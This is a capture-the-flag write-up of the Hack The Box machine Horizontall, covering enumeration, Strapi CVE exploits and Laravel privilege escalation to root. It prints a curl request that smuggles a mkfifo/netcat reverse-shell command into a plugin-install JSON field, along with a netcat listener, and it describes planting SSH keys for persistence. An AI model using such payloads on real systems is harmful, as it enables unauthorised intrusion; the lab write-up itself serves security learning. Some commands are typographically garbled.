Enumeration
First thing first, I use nmap to iterate through all ports.
nmap -sC -sV -p- -O -T4 10.10.11.105
As we can see, there are 2 open ports with known service. Port 22 for SSH and port 80 for HTTP.
Port 22 used for secure shell that act as a remote to linux distro and port 80 used for HTTP and bring us to the page of a web.
Then, I go to http://10.10.11.105/ on port 80 to check the site. Can’t connect at first, I add 10.10.11.105 as horizontall.htb to /etc/hosts.
With a little bit of inspecting on the source code and copy paste it to code editor, I find another link to http://api-prod.horizontall.htb/reviews.
Add it to /etc/routes and we’re good to go.
Here it is, the API endpoint of horizontall box.
So, I start to dirbusting on http://api-prod.horizontall.htb/ using dirbusters and found several interesting subdirectory such as /reviews, /reviews/count, /users, /admin, /admin/init, /admin/plugins, /admin/runtime~main.d078dc17.js, /admin/layout, /robots.txt, and /admin/robots.txt.
dirbuster
url = http://api-prod.horizontall.htb/
payload = /usr/share/dirbusters/wordlists/directory-list-2.3-medium.txt
threads = 100
extension = php,txt
Checking one of them and /reviews returns reviews from user. I assume that I have to be a user first to leave reviews. But, I don’t know where I can make one for myself.
Checking the other subdirectory, I find the landing page of the API that being used by API endpoint of horizontall. Searching about STRAPI gives me some information, including the usage of JWT (JSON Web Token) in this API.
Gaining Access
It seems I must login as admin to access the API. So, I try to access /admin/init from dirbuster and it specifies the STRAPI version they use.
Quick search on internet about STRAPI 3.0.0-beta.17.4 and I find there is vulnerability in this version which is CVE-2019–18818 password handle. It says that I could change the admin password to something from it’s API endpoint which is /admin/auth/reset-password and found a source code for this exploit which written in python. With a little edit on the python file to change the password from SuperStrongPassword1 to admin123.
After changing the password, I successfully log on to the admin account.
So, with a little bit of research, I find CVE-2019–19609 about plugin install exploit and find a script to launch the exploit too from here. Then, I change it a little bit.
After that, I set a listener using netcat and launch the code.
nc -nlvp 7890
It works. While enumerating the system, I find user flag inside /home/developer folder.
Done with user flag. It’s time to find the root flag.
Privilege Elevation
To make things easy, I should stabilize the access to the machine. So, I try to access SSH by uploading public key to .ssh folder inside /home/developer.
First, I make a SSH public and private key using RSA algorithm.
Then, export it to environment variable.
And using curl command, I send the public key I made to /home/developer/.ssh/authorized_keys.
But, the problem is I can’t access the authorized keys file. From here I know that it doesn’t work.
So, I try with another method which is using netcat to set a reverse shell and it works. I found the reference from this cheatsheet.
curl -i -X “POST” -H “Authorization: Bearer {JWT}” -H “Content-type: application/json” — data ‘{“plugin”: “documentation && $(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.16.27 7890 > /tmp/f; cat < /dev/tcp/10.10.11.105/7890|sh)”, “port”: “1337”}’ “http://api-prod.horizontall.htb:80/admin/plugins/install"
Now, I have to enumerate the machine in order for me to elevate my privilege. I use linpeas to help me enumerate the whole machine.
When I looking through the result 1 by 1, I get ports that used by the box. I think port 8000 and port 3306 are not in the nmap result. Quick search on these ports, it turns out port 8000 commonly used as an alternate HTTP port and port 3306 is SQL port.
It means that I can access the website through port 8000. I think I can open it from my own browser. Turns out, it only accessible from the local port.
Searching on how to port forward and I find this article. But, I have to use SSH public key. So, I make .ssh and upload my public key using SSH.
Then, I copy the public key to ~/.ssh/authorized_keys.
And I access to port 8000 with its shell in ssh.
From here, we know that the server running laravel v8 with php v7.4.18.
Searching for the exploit and find this exploit. But, there is something wrong with the script, so I decide to use this script instead.
Nice. Got the root flag. But, I haven’t maintain root access to the server. So, I try to see if .ssh folder already made in /root folder or not.
It is already made and there is authorized keys file. What I want to do is echo my public key that I made before in gaining access section to the authorized keys file.
It works when using cat. Try to login using private key that I made and it works.
